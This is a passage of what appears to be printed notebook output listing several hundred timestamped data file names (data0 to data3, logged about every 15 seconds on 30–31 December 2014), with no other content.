'data1Tue_Dec_30_22_34_47_2014.txt',\n 'data1Tue_Dec_30_22_35_01_2014.txt',\n 'data1Tue_Dec_30_22_35_16_2014.txt',\n 'data1Tue_Dec_30_22_35_31_2014.txt',\n 'data1Tue_Dec_30_22_35_46_2014.txt',\n 'data1Tue_Dec_30_22_36_01_2014.txt',\n 'data1Tue_Dec_30_22_36_16_2014.txt',\n 'data1Tue_Dec_30_22_36_30_2014.txt',\n 'data1Tue_Dec_30_22_36_45_2014.txt',\n 'data1Tue_Dec_30_22_37_00_2014.txt',\n 'data1Tue_Dec_30_22_37_15_2014.txt',\n 'data1Tue_Dec_30_22_37_30_2014.txt',\n 'data1Tue_Dec_30_22_37_44_2014.txt',\n 'data1Tue_Dec_30_22_37_59_2014.txt',\n 'data1Tue_Dec_30_22_38_14_2014.txt',\n 'data1Tue_Dec_30_22_38_28_2014.txt',\n 'data1Tue_Dec_30_22_38_44_2014.txt',\n 'data1Tue_Dec_30_22_38_58_2014.txt',\n 'data1Tue_Dec_30_22_39_13_2014.txt',\n 'data1Tue_Dec_30_22_39_28_2014.txt',\n 'data1Tue_Dec_30_22_39_42_2014.txt',\n 'data1Tue_Dec_30_22_39_57_2014.txt',\n 'data1Tue_Dec_30_22_40_13_2014.txt',\n 'data1Tue_Dec_30_22_40_27_2014.txt',\n 'data1Tue_Dec_30_22_40_41_2014.txt',\n 'data1Tue_Dec_30_22_40_56_2014.txt',\n 'data1Tue_Dec_30_22_41_11_2014.txt',\n 'data1Tue_Dec_30_22_41_26_2014.txt',\n 'data1Tue_Dec_30_22_41_41_2014.txt',\n 'data1Tue_Dec_30_22_41_56_2014.txt',\n 'data1Tue_Dec_30_22_42_10_2014.txt',\n 'data2Tue_Dec_30_22_42_25_2014.txt',\n 'data2Tue_Dec_30_22_42_40_2014.txt',\n 'data2Tue_Dec_30_22_42_54_2014.txt',\n 'data2Tue_Dec_30_22_43_09_2014.txt',\n 'data2Tue_Dec_30_22_43_24_2014.txt',\n 'data2Tue_Dec_30_22_43_39_2014.txt',\n 'data2Tue_Dec_30_22_43_53_2014.txt',\n 'data2Tue_Dec_30_22_44_08_2014.txt',\n 'data2Tue_Dec_30_22_44_23_2014.txt',\n 'data2Tue_Dec_30_22_44_37_2014.txt',\n 'data2Tue_Dec_30_22_44_52_2014.txt',\n 'data2Tue_Dec_30_22_45_06_2014.txt',\n 'data2Tue_Dec_30_22_45_21_2014.txt',\n 'data2Tue_Dec_30_22_45_36_2014.txt',\n 'data2Tue_Dec_30_22_45_50_2014.txt',\n 'data2Tue_Dec_30_22_46_05_2014.txt',\n 'data2Tue_Dec_30_22_46_20_2014.txt',\n 'data2Tue_Dec_30_22_46_35_2014.txt',\n 'data2Tue_Dec_30_22_46_50_2014.txt',\n 'data2Tue_Dec_30_22_47_05_2014.txt',\n 'data2Tue_Dec_30_22_47_20_2014.txt',\n 'data2Tue_Dec_30_22_47_35_2014.txt',\n 'data2Tue_Dec_30_22_47_49_2014.txt',\n 'data2Tue_Dec_30_22_48_04_2014.txt',\n 'data2Tue_Dec_30_22_48_19_2014.txt',\n 'data2Tue_Dec_30_22_48_34_2014.txt',\n 'data2Tue_Dec_30_22_48_49_2014.txt',\n 'data2Tue_Dec_30_22_49_04_2014.txt',\n 'data2Tue_Dec_30_22_49_19_2014.txt',\n 'data2Tue_Dec_30_22_49_34_2014.txt',\n 'data2Tue_Dec_30_22_49_49_2014.txt',\n 'data2Tue_Dec_30_22_50_04_2014.txt',\n 'data2Tue_Dec_30_22_50_19_2014.txt',\n 'data2Tue_Dec_30_22_50_33_2014.txt',\n 'data2Tue_Dec_30_22_50_48_2014.txt',\n 'data2Tue_Dec_30_22_51_03_2014.txt',\n 'data2Tue_Dec_30_22_51_18_2014.txt',\n 'data2Tue_Dec_30_22_51_32_2014.txt',\n 'data2Tue_Dec_30_22_51_47_2014.txt',\n 'data2Tue_Dec_30_22_52_02_2014.txt',\n 'data2Tue_Dec_30_22_52_16_2014.txt',\n 'data2Tue_Dec_30_22_52_31_2014.txt',\n 'data2Tue_Dec_30_22_52_46_2014.txt',\n 'data2Tue_Dec_30_22_53_01_2014.txt',\n 'data2Tue_Dec_30_22_53_16_2014.txt',\n 'data2Tue_Dec_30_22_53_31_2014.txt',\n 'data2Tue_Dec_30_22_53_45_2014.txt',\n 'data2Tue_Dec_30_22_54_00_2014.txt',\n 'data2Tue_Dec_30_22_54_15_2014.txt',\n 'data2Tue_Dec_30_22_54_29_2014.txt',\n 'data3Tue_Dec_30_22_54_44_2014.txt',\n 'data3Tue_Dec_30_22_54_59_2014.txt',\n 'data3Tue_Dec_30_22_55_13_2014.txt',\n 'data3Tue_Dec_30_22_55_28_2014.txt',\n 'data3Tue_Dec_30_22_55_43_2014.txt',\n 'data3Tue_Dec_30_22_55_58_2014.txt',\n 'data3Tue_Dec_30_22_56_13_2014.txt',\n 'data3Tue_Dec_30_22_56_28_2014.txt',\n 'data3Tue_Dec_30_22_56_43_2014.txt',\n 'data3Tue_Dec_30_22_56_57_2014.txt',\n 'data3Tue_Dec_30_22_57_12_2014.txt',\n 'data3Tue_Dec_30_22_57_27_2014.txt',\n 'data3Tue_Dec_30_22_57_42_2014.txt',\n 'data3Tue_Dec_30_22_57_56_2014.txt',\n 'data3Tue_Dec_30_22_58_12_2014.txt',\n 'data3Tue_Dec_30_22_58_26_2014.txt',\n 'data3Tue_Dec_30_22_58_41_2014.txt',\n 'data3Tue_Dec_30_22_58_56_2014.txt',\n 'data3Tue_Dec_30_22_59_10_2014.txt',\n 'data3Tue_Dec_30_22_59_25_2014.txt',\n 'data3Tue_Dec_30_22_59_40_2014.txt',\n 'data3Tue_Dec_30_22_59_54_2014.txt',\n 'data3Tue_Dec_30_23_00_10_2014.txt',\n 'data3Tue_Dec_30_23_00_25_2014.txt',\n 'data3Tue_Dec_30_23_00_39_2014.txt',\n 'data3Tue_Dec_30_23_00_54_2014.txt',\n 'data3Tue_Dec_30_23_01_09_2014.txt',\n 'data3Tue_Dec_30_23_01_23_2014.txt',\n 'data3Tue_Dec_30_23_01_38_2014.txt',\n 'data3Tue_Dec_30_23_01_53_2014.txt',\n 'data3Tue_Dec_30_23_02_07_2014.txt',\n 'data3Tue_Dec_30_23_02_22_2014.txt',\n 'data3Tue_Dec_30_23_02_37_2014.txt',\n 'data3Tue_Dec_30_23_02_52_2014.txt',\n 'data3Tue_Dec_30_23_03_06_2014.txt',\n 'data3Tue_Dec_30_23_03_21_2014.txt',\n 'data3Tue_Dec_30_23_03_36_2014.txt',\n 'data3Tue_Dec_30_23_03_51_2014.txt',\n 'data3Tue_Dec_30_23_04_05_2014.txt',\n 'data3Tue_Dec_30_23_04_20_2014.txt',\n 'data3Tue_Dec_30_23_04_34_2014.txt',\n 'data3Tue_Dec_30_23_04_49_2014.txt',\n 'data3Tue_Dec_30_23_05_04_2014.txt',\n 'data3Tue_Dec_30_23_05_19_2014.txt',\n 'data3Tue_Dec_30_23_05_34_2014.txt',\n 'data3Tue_Dec_30_23_05_49_2014.txt',\n 'data3Tue_Dec_30_23_06_04_2014.txt',\n 'data3Tue_Dec_30_23_06_18_2014.txt',\n 'data3Tue_Dec_30_23_06_33_2014.txt',\n 'data3Tue_Dec_30_23_06_48_2014.txt',\n 'data0Tue_Dec_30_23_07_28_2014.txt',\n 'data0Tue_Dec_30_23_07_42_2014.txt',\n 'data0Tue_Dec_30_23_07_58_2014.txt',\n 'data0Tue_Dec_30_23_08_12_2014.txt',\n 'data0Tue_Dec_30_23_08_27_2014.txt',\n 'data0Tue_Dec_30_23_08_42_2014.txt',\n 'data0Tue_Dec_30_23_08_57_2014.txt',\n 'data0Tue_Dec_30_23_09_12_2014.txt',\n 'data0Tue_Dec_30_23_09_27_2014.txt',\n 'data0Tue_Dec_30_23_09_42_2014.txt',\n 'data0Tue_Dec_30_23_09_57_2014.txt',\n 'data0Tue_Dec_30_23_10_12_2014.txt',\n 'data0Tue_Dec_30_23_10_26_2014.txt',\n 'data0Tue_Dec_30_23_10_42_2014.txt',\n 'data0Tue_Dec_30_23_10_57_2014.txt',\n 'data0Tue_Dec_30_23_11_12_2014.txt',\n 'data0Tue_Dec_30_23_11_27_2014.txt',\n 'data0Tue_Dec_30_23_11_42_2014.txt',\n 'data0Tue_Dec_30_23_11_56_2014.txt',\n 'data0Tue_Dec_30_23_12_11_2014.txt',\n 'data0Tue_Dec_30_23_12_26_2014.txt',\n 'data0Tue_Dec_30_23_12_40_2014.txt',\n 'data0Tue_Dec_30_23_12_55_2014.txt',\n 'data0Tue_Dec_30_23_13_10_2014.txt',\n 'data0Tue_Dec_30_23_13_25_2014.txt',\n 'data0Tue_Dec_30_23_13_40_2014.txt',\n 'data0Tue_Dec_30_23_13_55_2014.txt',\n 'data0Tue_Dec_30_23_14_11_2014.txt',\n 'data0Tue_Dec_30_23_14_26_2014.txt',\n 'data0Tue_Dec_30_23_14_40_2014.txt',\n 'data0Tue_Dec_30_23_14_55_2014.txt',\n 'data0Tue_Dec_30_23_15_09_2014.txt',\n 'data0Tue_Dec_30_23_15_24_2014.txt',\n 'data0Tue_Dec_30_23_15_39_2014.txt',\n 'data0Tue_Dec_30_23_15_54_2014.txt',\n 'data0Tue_Dec_30_23_16_08_2014.txt',\n 'data0Tue_Dec_30_23_16_23_2014.txt',\n 'data0Tue_Dec_30_23_16_37_2014.txt',\n 'data0Tue_Dec_30_23_16_52_2014.txt',\n 'data0Tue_Dec_30_23_17_08_2014.txt',\n 'data0Tue_Dec_30_23_17_23_2014.txt',\n 'data0Tue_Dec_30_23_17_37_2014.txt',\n 'data0Tue_Dec_30_23_17_52_2014.txt',\n 'data0Tue_Dec_30_23_18_07_2014.txt',\n 'data0Tue_Dec_30_23_18_22_2014.txt',\n 'data0Tue_Dec_30_23_18_36_2014.txt',\n 'data0Tue_Dec_30_23_18_51_2014.txt',\n 'data0Tue_Dec_30_23_19_06_2014.txt',\n 'data0Tue_Dec_30_23_19_21_2014.txt',\n 'data0Tue_Dec_30_23_19_36_2014.txt',\n 'data1Tue_Dec_30_23_19_50_2014.txt',\n 'data1Tue_Dec_30_23_20_05_2014.txt',\n 'data1Tue_Dec_30_23_20_20_2014.txt',\n 'data1Tue_Dec_30_23_20_34_2014.txt',\n 'data1Tue_Dec_30_23_20_49_2014.txt',\n 'data1Tue_Dec_30_23_21_04_2014.txt',\n 'data1Tue_Dec_30_23_21_19_2014.txt',\n 'data1Tue_Dec_30_23_21_33_2014.txt',\n 'data1Tue_Dec_30_23_21_48_2014.txt',\n 'data1Tue_Dec_30_23_22_03_2014.txt',\n 'data1Tue_Dec_30_23_22_18_2014.txt',\n 'data1Tue_Dec_30_23_22_33_2014.txt',\n 'data1Tue_Dec_30_23_22_48_2014.txt',\n 'data1Tue_Dec_30_23_23_03_2014.txt',\n 'data1Tue_Dec_30_23_23_17_2014.txt',\n 'data1Tue_Dec_30_23_23_32_2014.txt',\n 'data1Tue_Dec_30_23_23_47_2014.txt',\n 'data1Tue_Dec_30_23_24_02_2014.txt',\n 'data1Tue_Dec_30_23_24_16_2014.txt',\n 'data1Tue_Dec_30_23_24_31_2014.txt',\n 'data1Tue_Dec_30_23_24_45_2014.txt',\n 'data1Tue_Dec_30_23_25_00_2014.txt',\n 'data1Tue_Dec_30_23_25_15_2014.txt',\n 'data1Tue_Dec_30_23_25_29_2014.txt',\n 'data1Tue_Dec_30_23_25_44_2014.txt',\n 'data1Tue_Dec_30_23_25_59_2014.txt',\n 'data1Tue_Dec_30_23_26_13_2014.txt',\n 'data1Tue_Dec_30_23_26_28_2014.txt',\n 'data1Tue_Dec_30_23_26_43_2014.txt',\n 'data1Tue_Dec_30_23_26_58_2014.txt',\n 'data1Tue_Dec_30_23_27_13_2014.txt',\n 'data1Tue_Dec_30_23_27_27_2014.txt',\n 'data1Tue_Dec_30_23_27_42_2014.txt',\n 'data1Tue_Dec_30_23_27_57_2014.txt',\n 'data1Tue_Dec_30_23_28_11_2014.txt',\n 'data1Tue_Dec_30_23_28_26_2014.txt',\n 'data1Tue_Dec_30_23_28_42_2014.txt',\n 'data1Tue_Dec_30_23_28_56_2014.txt',\n 'data1Tue_Dec_30_23_29_11_2014.txt',\n 'data1Tue_Dec_30_23_29_26_2014.txt',\n 'data1Tue_Dec_30_23_29_41_2014.txt',\n 'data1Tue_Dec_30_23_29_56_2014.txt',\n 'data1Tue_Dec_30_23_30_10_2014.txt',\n 'data1Tue_Dec_30_23_30_25_2014.txt',\n 'data1Tue_Dec_30_23_30_40_2014.txt',\n 'data1Tue_Dec_30_23_30_55_2014.txt',\n 'data1Tue_Dec_30_23_31_10_2014.txt',\n 'data1Tue_Dec_30_23_31_25_2014.txt',\n 'data1Tue_Dec_30_23_31_39_2014.txt',\n 'data1Tue_Dec_30_23_31_54_2014.txt',\n 'data2Tue_Dec_30_23_32_09_2014.txt',\n 'data2Tue_Dec_30_23_32_24_2014.txt',\n 'data2Tue_Dec_30_23_32_39_2014.txt',\n 'data2Tue_Dec_30_23_32_53_2014.txt',\n 'data2Tue_Dec_30_23_33_08_2014.txt',\n 'data2Tue_Dec_30_23_33_23_2014.txt',\n 'data2Tue_Dec_30_23_33_38_2014.txt',\n 'data2Tue_Dec_30_23_33_53_2014.txt',\n 'data2Tue_Dec_30_23_34_08_2014.txt',\n 'data2Tue_Dec_30_23_34_23_2014.txt',\n 'data2Tue_Dec_30_23_34_37_2014.txt',\n 'data2Tue_Dec_30_23_34_52_2014.txt',\n 'data2Tue_Dec_30_23_35_07_2014.txt',\n 'data2Tue_Dec_30_23_35_22_2014.txt',\n 'data2Tue_Dec_30_23_35_37_2014.txt',\n 'data2Tue_Dec_30_23_35_52_2014.txt',\n 'data2Tue_Dec_30_23_36_07_2014.txt',\n 'data2Tue_Dec_30_23_36_22_2014.txt',\n 'data2Tue_Dec_30_23_36_36_2014.txt',\n 'data2Tue_Dec_30_23_36_51_2014.txt',\n 'data2Tue_Dec_30_23_37_06_2014.txt',\n 'data2Tue_Dec_30_23_37_20_2014.txt',\n 'data2Tue_Dec_30_23_37_35_2014.txt',\n 'data2Tue_Dec_30_23_37_50_2014.txt',\n 'data2Tue_Dec_30_23_38_05_2014.txt',\n 'data2Tue_Dec_30_23_38_20_2014.txt',\n 'data2Tue_Dec_30_23_38_35_2014.txt',\n 'data2Tue_Dec_30_23_38_50_2014.txt',\n 'data2Tue_Dec_30_23_39_05_2014.txt',\n 'data2Tue_Dec_30_23_39_19_2014.txt',\n 'data2Tue_Dec_30_23_39_34_2014.txt',\n 'data2Tue_Dec_30_23_39_49_2014.txt',\n 'data2Tue_Dec_30_23_40_04_2014.txt',\n 'data2Tue_Dec_30_23_40_18_2014.txt',\n 'data2Tue_Dec_30_23_40_33_2014.txt',\n 'data2Tue_Dec_30_23_40_48_2014.txt',\n 'data2Tue_Dec_30_23_41_03_2014.txt',\n 'data2Tue_Dec_30_23_41_18_2014.txt',\n 'data2Tue_Dec_30_23_41_33_2014.txt',\n 'data2Tue_Dec_30_23_41_48_2014.txt',\n 'data2Tue_Dec_30_23_42_03_2014.txt',\n 'data2Tue_Dec_30_23_42_18_2014.txt',\n 'data2Tue_Dec_30_23_42_33_2014.txt',\n 'data2Tue_Dec_30_23_42_47_2014.txt',\n 'data2Tue_Dec_30_23_43_02_2014.txt',\n 'data2Tue_Dec_30_23_43_18_2014.txt',\n 'data2Tue_Dec_30_23_43_33_2014.txt',\n 'data2Tue_Dec_30_23_43_47_2014.txt',\n 'data2Tue_Dec_30_23_44_02_2014.txt',\n 'data2Tue_Dec_30_23_44_17_2014.txt',\n 'data3Tue_Dec_30_23_44_32_2014.txt',\n 'data3Tue_Dec_30_23_44_46_2014.txt',\n 'data3Tue_Dec_30_23_45_01_2014.txt',\n 'data3Tue_Dec_30_23_45_16_2014.txt',\n 'data3Tue_Dec_30_23_45_31_2014.txt',\n 'data3Tue_Dec_30_23_45_46_2014.txt',\n 'data3Tue_Dec_30_23_46_00_2014.txt',\n 'data3Tue_Dec_30_23_46_16_2014.txt',\n 'data3Tue_Dec_30_23_46_31_2014.txt',\n 'data3Tue_Dec_30_23_46_46_2014.txt',\n 'data3Tue_Dec_30_23_47_01_2014.txt',\n 'data3Tue_Dec_30_23_47_16_2014.txt',\n 'data3Tue_Dec_30_23_47_31_2014.txt',\n 'data3Tue_Dec_30_23_47_46_2014.txt',\n 'data3Tue_Dec_30_23_48_01_2014.txt',\n 'data3Tue_Dec_30_23_48_16_2014.txt',\n 'data3Tue_Dec_30_23_48_31_2014.txt',\n 'data3Tue_Dec_30_23_48_45_2014.txt',\n 'data3Tue_Dec_30_23_49_00_2014.txt',\n 'data3Tue_Dec_30_23_49_15_2014.txt',\n 'data3Tue_Dec_30_23_49_30_2014.txt',\n 'data3Tue_Dec_30_23_49_45_2014.txt',\n 'data3Tue_Dec_30_23_49_59_2014.txt',\n 'data3Tue_Dec_30_23_50_14_2014.txt',\n 'data3Tue_Dec_30_23_50_29_2014.txt',\n 'data3Tue_Dec_30_23_50_44_2014.txt',\n 'data3Tue_Dec_30_23_50_59_2014.txt',\n 'data3Tue_Dec_30_23_51_13_2014.txt',\n 'data3Tue_Dec_30_23_51_28_2014.txt',\n 'data3Tue_Dec_30_23_51_43_2014.txt',\n 'data3Tue_Dec_30_23_51_57_2014.txt',\n 'data3Tue_Dec_30_23_52_13_2014.txt',\n 'data3Tue_Dec_30_23_52_28_2014.txt',\n 'data3Tue_Dec_30_23_52_43_2014.txt',\n 'data3Tue_Dec_30_23_52_58_2014.txt',\n 'data3Tue_Dec_30_23_53_12_2014.txt',\n 'data3Tue_Dec_30_23_53_27_2014.txt',\n 'data3Tue_Dec_30_23_53_42_2014.txt',\n 'data3Tue_Dec_30_23_53_56_2014.txt',\n 'data3Tue_Dec_30_23_54_11_2014.txt',\n 'data3Tue_Dec_30_23_54_26_2014.txt',\n 'data3Tue_Dec_30_23_54_41_2014.txt',\n 'data3Tue_Dec_30_23_54_56_2014.txt',\n 'data3Tue_Dec_30_23_55_11_2014.txt',\n 'data3Tue_Dec_30_23_55_26_2014.txt',\n 'data3Tue_Dec_30_23_55_41_2014.txt',\n 'data3Tue_Dec_30_23_55_55_2014.txt',\n 'data3Tue_Dec_30_23_56_10_2014.txt',\n 'data3Tue_Dec_30_23_56_25_2014.txt',\n 'data3Tue_Dec_30_23_56_40_2014.txt',\n 'data0Tue_Dec_30_23_57_21_2014.txt',\n 'data0Tue_Dec_30_23_57_36_2014.txt',\n 'data0Tue_Dec_30_23_57_51_2014.txt',\n 'data0Tue_Dec_30_23_58_06_2014.txt',\n 'data0Tue_Dec_30_23_58_20_2014.txt',\n 'data0Tue_Dec_30_23_58_35_2014.txt',\n 'data0Tue_Dec_30_23_58_50_2014.txt',\n 'data0Tue_Dec_30_23_59_05_2014.txt',\n 'data0Tue_Dec_30_23_59_20_2014.txt',\n 'data0Tue_Dec_30_23_59_35_2014.txt',\n 'data0Tue_Dec_30_23_59_49_2014.txt',\n 'data0Wed_Dec_31_00_00_04_2014.txt',\n 'data0Wed_Dec_31_00_00_18_2014.txt',\n 'data0Wed_Dec_31_00_00_33_2014.txt',\n 'data0Wed_Dec_31_00_00_48_2014.txt',\n 'data0Wed_Dec_31_00_01_02_2014.txt',\n 'data0Wed_Dec_31_00_01_17_2014.txt',\n 'data0Wed_Dec_31_00_01_32_2014.txt',\n 'data0Wed_Dec_31_00_01_48_2014.txt',\n 'data0Wed_Dec_31_00_02_02_2014.txt',\n 'data0Wed_Dec_31_00_02_18_2014.txt',\n 'data0Wed_Dec_31_00_02_32_2014.txt',\n 'data0Wed_Dec_31_00_02_47_2014.txt',\n 'data0Wed_Dec_31_00_03_01_2014.txt',\n 'data0Wed_Dec_31_00_03_17_2014.txt',\n 'data0Wed_Dec_31_00_03_32_2014.txt',\n 'data0Wed_Dec_31_00_03_46_2014.txt',\n 'data0Wed_Dec_31_00_04_01_2014.txt',\n 'data0Wed_Dec_31_00_04_16_2014.txt',\n 'data0Wed_Dec_31_00_04_31_2014.txt',\n 'data0Wed_Dec_31_00_04_46_2014.txt',\n 'data0Wed_Dec_31_00_05_00_2014.txt',\n 'data0Wed_Dec_31_00_05_15_2014.txt',\n 'data0Wed_Dec_31_00_05_31_2014.txt',\n 'data0Wed_Dec_31_00_05_46_2014.txt',\n 'data0Wed_Dec_31_00_06_01_2014.txt',\n 'data0Wed_Dec_31_00_06_15_2014.txt',\n 'data0Wed_Dec_31_00_06_30_2014.txt',\n 'data0Wed_Dec_31_00_06_45_2014.txt',\n 'data0Wed_Dec_31_00_07_00_2014.txt',\n 'data0Wed_Dec_31_00_07_14_2014.txt',\n 'data0Wed_Dec_31_00_07_29_2014.txt',\n 'data0Wed_Dec_31_00_07_44_2014.txt',\n 'data0Wed_Dec_31_00_07_59_2014.txt',\n 'data0Wed_Dec_31_00_08_13_2014.txt',\n 'data0Wed_Dec_31_00_08_28_2014.txt',\n 'data0Wed_Dec_31_00_08_43_2014.txt',\n 'data0Wed_Dec_31_00_08_57_2014.txt',\n 'data0Wed_Dec_31_00_09_12_2014.txt',\n 'data0Wed_Dec_31_00_09_27_2014.txt',\n 'data1Wed_Dec_31_00_09_42_2014.txt',\n 'data1Wed_Dec_31_00_09_57_2014.txt',\n 'data1Wed_Dec_31_00_10_11_2014.txt',\n 'data1Wed_Dec_31_00_10_26_2014.txt',\n 'data1Wed_Dec_31_00_10_41_2014.txt',\n 'data1Wed_Dec_31_00_10_56_2014.txt',\n 'data1Wed_Dec_31_00_11_11_2014.txt',\n 'data1Wed_Dec_31_00_11_26_2014.txt',\n 'data1Wed_Dec_31_00_11_40_2014.txt',\n 'data1Wed_Dec_31_00_11_55_2014.txt',\n 'data1Wed_Dec_31_00_12_10_2014.txt',\n 'data1Wed_Dec_31_00_12_25_2014.txt',\n 'data1Wed_Dec_31_00_12_40_2014.txt',\n 'data1Wed_Dec_31_00_12_54_2014.txt',\n 'data1Wed_Dec_31_00_13_09_2014.txt',\n 'data1Wed_Dec_31_00_13_24_2014.txt',\n 'data1Wed_Dec_31_00_13_39_2014.txt',\n 'data1Wed_Dec_31_00_13_54_2014.txt',\n 'data1Wed_Dec_31_00_14_09_2014.txt',\n 'data1Wed_Dec_31_00_14_24_2014.txt',\n 'data1Wed_Dec_31_00_14_38_2014.txt',\n 'data1Wed_Dec_31_00_14_53_2014.txt',\n 'data1Wed_Dec_31_00_15_07_2014.txt',\n 'data1Wed_Dec_31_00_15_22_2014.txt',\n 'data1Wed_Dec_31_00_15_37_2014.txt',\n 'data1Wed_Dec_31_00_15_52_2014.txt',\n 'data1Wed_Dec_31_00_16_06_2014.txt',\n 'data1Wed_Dec_31_00_16_22_2014.txt',\n 'data1Wed_Dec_31_00_16_38_2014.txt',\n 'data1Wed_Dec_31_00_16_52_2014.txt',\n 'data1Wed_Dec_31_00_17_07_2014.txt',\n 'data1Wed_Dec_31_00_17_22_2014.txt',\n 'data1Wed_Dec_31_00_17_37_2014.txt',\n 'data1Wed_Dec_31_00_17_51_2014.txt',\n 'data1Wed_Dec_31_00_18_06_2014.txt',\n 'data1Wed_Dec_31_00_18_20_2014.txt',\n 'data1Wed_Dec_31_00_18_35_2014.txt',\n 'data1Wed_Dec_31_00_18_50_2014.txt',\n 'data1Wed_Dec_31_00_19_04_2014.txt',\n 'data1Wed_Dec_31_00_19_19_2014.txt',\n 'data1Wed_Dec_31_00_19_34_2014.txt',\n 'data1Wed_Dec_31_00_19_48_2014.txt',\n 'data1Wed_Dec_31_00_20_03_2014.txt',\n 'data1Wed_Dec_31_00_20_18_2014.txt',\n 'data1Wed_Dec_31_00_20_33_2014.txt',\n 'data1Wed_Dec_31_00_20_48_2014.txt',\n 'data1Wed_Dec_31_00_21_03_2014.txt',\n 'data1Wed_Dec_31_00_21_18_2014.txt',\n 'data1Wed_Dec_31_00_21_32_2014.txt',\n 'data1Wed_Dec_31_00_21_47_2014.txt',\n 'data2Wed_Dec_31_00_22_02_2014.txt',\n 'data2Wed_Dec_31_00_22_17_2014.txt',\n 'data2Wed_Dec_31_00_22_32_2014.txt',\n 'data2Wed_Dec_31_00_22_47_2014.txt',\n 'data2Wed_Dec_31_00_23_01_2014.txt',\n 'data2Wed_Dec_31_00_23_16_2014.txt',\n 'data2Wed_Dec_31_00_23_31_2014.txt',\n 'data2Wed_Dec_31_00_23_46_2014.txt',\n 'data2Wed_Dec_31_00_24_01_2014.txt',\n 'data2Wed_Dec_31_00_24_16_2014.txt',\n 'data2Wed_Dec_31_00_24_30_2014.txt',\n 'data2Wed_Dec_31_00_24_45_2014.txt',\n 'data2Wed_Dec_31_00_25_00_2014.txt',\n 'data2Wed_Dec_31_00_25_15_2014.txt',\n 'data2Wed_Dec_31_00_25_29_2014.txt',\n 'data2Wed_Dec_31_00_25_44_2014.txt',\n 'data2Wed_Dec_31_00_25_59_2014.txt',\n 'data2Wed_Dec_31_00_26_14_2014.txt',\n 'data2Wed_Dec_31_00_26_29_2014.txt',\n 'data2Wed_Dec_31_00_26_43_2014.txt',\n 'data2Wed_Dec_31_00_26_59_2014.txt',\n 'data2Wed_Dec_31_00_27_13_2014.txt',\n 'data2Wed_Dec_31_00_27_28_2014.txt',\n 'data2Wed_Dec_31_00_27_43_2014.txt',\n 'data2Wed_Dec_31_00_27_58_2014.txt',\n 'data2Wed_Dec_31_00_28_13_2014.txt',\n 'data2Wed_Dec_31_00_28_28_2014.txt',\n 'data2Wed_Dec_31_00_28_43_2014.txt',\n 'data2Wed_Dec_31_00_28_57_2014.txt',\n 'data2Wed_Dec_31_00_29_12_2014.txt',\n 'data2Wed_Dec_31_00_29_27_2014.txt',\n 'data2Wed_Dec_31_00_29_42_2014.txt',\n 'data2Wed_Dec_31_00_29_57_2014.txt',\n 'data2Wed_Dec_31_00_30_12_2014.txt',\n 'data2Wed_Dec_31_00_30_27_2014.txt',\n 'data2Wed_Dec_31_00_30_42_2014.txt',\n 'data2Wed_Dec_31_00_30_57_2014.txt',\n 'data2Wed_Dec_31_00_31_12_2014.txt',\n 'data2Wed_Dec_31_00_31_27_2014.txt',\n 'data2Wed_Dec_31_00_31_41_2014.txt',\n 'data2Wed_Dec_31_00_31_56_2014.txt',\n 'data2Wed_Dec_31_00_32_11_2014.txt',\n 'data2Wed_Dec_31_00_32_26_2014.txt',\n 'data2Wed_Dec_31_00_32_40_2014.txt',\n 'data2Wed_Dec_31_00_32_55_2014.txt',\n 'data2Wed_Dec_31_00_33_10_2014.txt',\n 'data2Wed_Dec_31_00_33_24_2014.txt',\n 'data2Wed_Dec_31_00_33_39_2014.txt',\n 'data2Wed_Dec_31_00_33_54_2014.txt',\n 'data2Wed_Dec_31_00_34_09_2014.txt',\n 'data3Wed_Dec_31_00_34_24_2014.txt',\n 'data3Wed_Dec_31_00_34_39_2014.txt',\n 'data3Wed_Dec_31_00_34_54_2014.txt',\n 'data3Wed_Dec_31_00_35_09_2014.txt',\n 'data3Wed_Dec_31_00_35_24_2014.txt',\n 'data3Wed_Dec_31_00_35_39_2014.txt',\n 'data3Wed_Dec_31_00_35_54_2014.txt',\n 'data3Wed_Dec_31_00_36_08_2014.txt',\n 'data3Wed_Dec_31_00_36_23_2014.txt',\n 'data3Wed_Dec_31_00_36_38_2014.txt',\n 'data3Wed_Dec_31_00_36_53_2014.txt',\n 'data3Wed_Dec_31_00_37_08_2014.txt',\n 'data3Wed_Dec_31_00_37_22_2014.txt',\n 'data3Wed_Dec_31_00_37_38_2014.txt',\n 'data3Wed_Dec_31_00_37_53_2014.txt',\n 'data3Wed_Dec_31_00_38_08_2014.txt',\n 'data3Wed_Dec_31_00_38_22_2014.txt',\n 'data3Wed_Dec_31_00_38_37_2014.txt',\n 'data3Wed_Dec_31_00_38_52_2014.txt',\n 'data3Wed_Dec_31_00_39_07_2014.txt',\n 'data3Wed_Dec_31_00_39_22_2014.txt',\n 'data3Wed_Dec_31_00_39_36_2014.txt',\n 'data3Wed_Dec_31_00_39_51_2014.txt',\n 'data3Wed_Dec_31_00_40_06_2014.txt',\n 'data3Wed_Dec_31_00_40_21_2014.txt',\n 'data3Wed_Dec_31_00_40_36_2014.txt',\n 'data3Wed_Dec_31_00_40_50_2014.txt',\n 'data3Wed_Dec_31_00_41_05_2014.txt',\n 'data3Wed_Dec_31_00_41_20_2014.txt',\n 'data3Wed_Dec_31_00_41_34_2014.txt',\n 'data3Wed_Dec_31_00_41_50_2014.txt',\n 'data3Wed_Dec_31_00_42_04_2014.txt',\n 'data3Wed_Dec_31_00_42_19_2014.txt',\n 'data3Wed_Dec_31_00_42_33_2014.txt',\n 'data3Wed_Dec_31_00_42_48_2014.txt',\n 'data3Wed_Dec_31_00_43_03_2014.txt',\n 'data3Wed_Dec_31_00_43_18_2014.txt',\n 'data3Wed_Dec_31_00_43_33_2014.txt',\n 'data3Wed_Dec_31_00_43_48_2014.txt',\n 'data3Wed_Dec_31_00_44_03_2014.txt',\n 'data3Wed_Dec_31_00_44_18_2014.txt',\n 'data3Wed_Dec_31_00_44_33_2014.txt',\n 'data3Wed_Dec_31_00_44_48_2014.txt',\n 'data3Wed_Dec_31_00_45_03_2014.txt',\n 'data3Wed_Dec_31_00_45_18_2014.txt',\n 'data3Wed_Dec_31_00_45_33_2014.txt',\n 'data3Wed_Dec_31_00_45_48_2014.txt',\n 'data3Wed_Dec_31_00_46_03_2014.txt',\n 'data3Wed_Dec_31_00_46_18_2014.txt', 'data3Wed_Dec_31_00_46_32_2014.txt']\n",
